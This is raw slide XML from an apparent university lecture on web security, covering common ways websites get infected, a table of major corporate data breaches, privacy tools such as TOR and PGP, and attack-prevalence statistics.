              <a:rPr lang="ja-JP" altLang="en-US" sz="2900">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2900">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2900">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2900">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> infect websites with malware?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2900">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRP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EBEF77B-C0E0-4B8D-AF67-C5E10154D224}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31748" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Some common ways that websites get infected are (ref [6])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Cross-site scripting attacks (XSS) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Most common form of attack since 2008. More details on this later</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>SQL injection attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>These attacks maliciously alter the backend databases of websites thus making them redirect users to malware sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Search Engine result Redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>:Easter related search results poisoned redirecting users to malicious software</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Attacks on backend virtual hosting companies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities in web-server or forum-hosting software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>PhPBB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> (PHP Bulletin Boards) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>vulnerabilites</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Using social networking sites to infect users (these are a combination of social engineering and above attacks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> SAMY worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> (see the bookmarks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3"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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Top 10 Corporate Hacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</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242450F-42EF-4461-A760-4ACF3649C57C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Table 11"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1371600" y="1828800"/>
          <a:ext cx="6629400" cy="3649668"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>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Company </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Number of Records Stolen</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eBay</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145,000,000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Heartland</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130,000,000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T.J. Max/t.K. Maxx</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94,000,000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3"/>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AOL</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92,000,000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4"/>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Anthem</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80,000,000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5"/>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Sony</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77,000,000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6"/>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J.P. Morgan Chase</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76,000,000 (2014) 100,000,000 (2015)</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7"/>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Target</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70,000,000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8"/>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Home Depot</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56,000,000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9"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="331788">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Gill Sans MT" charset="0"/>
                          <a:ea typeface="MS PGothic" charset="-128"/>
                        </a:rPr>
                        <a:t>Evernote</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>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600"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="76000"/>
                        <a:buFont typeface="Wingdings 3" charset="2"/>
                        <a:defRPr sz="2200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT" charset="0"/>
                          <a:ea typeface="MS PGothic" charset="-128"/>
                          <a:cs typeface="Geneva" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr marL="742950" indent="-285750">
                        <a:spcBef>
                          <a:spcPts val="500"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent2"/>
                        </a:buClr>
                        <a:buSzPct val="76000"/>
                        <a:buFont typeface="Wingdings 3" charset="2"/>
                        <a:defRPr sz="2100">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT" charset="0"/>
                          <a:ea typeface="Geneva" charset="0"/>
                          <a:cs typeface="Geneva" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr marL="1143000" indent="-228600">
                        <a:spcBef>
                          <a:spcPts val="500"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="BCBCBC"/>
                        </a:buClr>
                        <a:buSzPct val="76000"/>
                        <a:buFont typeface="Wingdings 3" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT" charset="0"/>
                          <a:ea typeface="Geneva" charset="0"/>
                          <a:cs typeface="Geneva" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr marL="1600200" indent="-228600">
                        <a:spcBef>
                          <a:spcPts val="400"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="8BA2B4"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:defRPr sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT" charset="0"/>
                          <a:ea typeface="Geneva" charset="0"/>
                          <a:cs typeface="Geneva" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr marL="2057400" indent="-228600">
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent2"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:defRPr sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT" charset="0"/>
                          <a:ea typeface="Geneva" charset="0"/>
                          <a:cs typeface="Geneva" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="accent2"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:defRPr sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT" charset="0"/>
                          <a:ea typeface="Geneva" charset="0"/>
                          <a:cs typeface="Geneva"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ill Sans MT" charset="0"/>
                          <a:ea typeface="MS PGothic" charset="-128"/>
                        </a:rPr>
                        <a:t>50,000,000</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri" charset="0"/>
                        <a:ea typeface="MS PGothic"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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Privacy Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65541" name="Footer Placeholder 4"/>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D395BC-0247-48B7-8D5B-EA040F339278}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203"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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>TOR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142340" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="6356350"/>
            <a:ext cx="4346575"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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="901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D775D68-AE06-4164-8DD0-2D81BA33E2A5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90116" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The TOR network is a protective layer that sits between the User and the Internet. It provides an anonymous path between you and sites you visit. MIT researcher broke TOR anonymity in 2015.  A fix is pending.  MIT has a new anonymous network in development called Riffle.</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90117" name="Picture 1" descr="Screen Shot 2014-03-28 at 9.57.53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125" y="1955800"/>
            <a:ext cx="77120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en-US" altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>PGP &amp; S/MIME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142340" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="6356350"/>
            <a:ext cx="4346575" cy="365125"/>
          </a:xfrm>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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911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BFA5D36-5643-4EB4-8483-EA184BB026F7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91140" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Pretty Good Privacy (PGP) is data encryption technology commonly used for encrypting files,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> especially e-mails. S/MIME is a standard for public encryption and signing of MIME data in e-mails.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91141" name="Picture 3" descr="Screen Shot 2014-03-28 at 10.03.22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7724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cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Top 15 attacks (2012)</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27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214F7B6-D273-43E4-9D64-394984849A1B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32772" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="5562600"/>
            <a:ext cx="300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a:t>(source: WhiteHat Security)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32773" name="Picture 1" descr="Screen Shot 2014-11-07 at 2.41.04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104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cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Attack prevalence by class (2012)</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37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3273822-9146-45EB-A539-DA0CE3190619}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33796" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="5954713"/>
            <a:ext cx="300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a:t>(source: WhiteHat Security)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33797" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="5389563"/>
            <a:ext cx="6553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200" dirty="0"/>
              <a:t>Data greatly differs from TOP 15: one website may possess hundreds of unique issues of a specific class, another may not contain any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33798" name="Picture 5" descr="Screen Shot 2014-11-07 at 2.51.07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588803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85800" y="152400"/>
            <a:ext cx="7848600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Median days vulnerability class (2014)</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r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348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845673-478A-4DFB-BAA1-707709F77422}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
